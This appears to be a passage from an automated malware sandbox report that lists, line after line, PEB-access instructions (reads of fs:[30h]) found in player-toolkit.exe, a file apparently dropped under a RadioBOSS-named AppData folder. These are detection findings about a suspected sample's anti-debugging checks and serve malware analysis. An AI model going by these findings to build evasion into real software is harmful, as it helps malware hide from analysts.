Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02970050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02970050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A21074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029861A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029861A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029E41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029836CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02998EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029676E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029816E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02988E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02967E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02968794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029937F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02954F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02954F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A114FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A205AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A205AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02952D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02981DB5 mov eax, dword ptr fs:[00000030h]
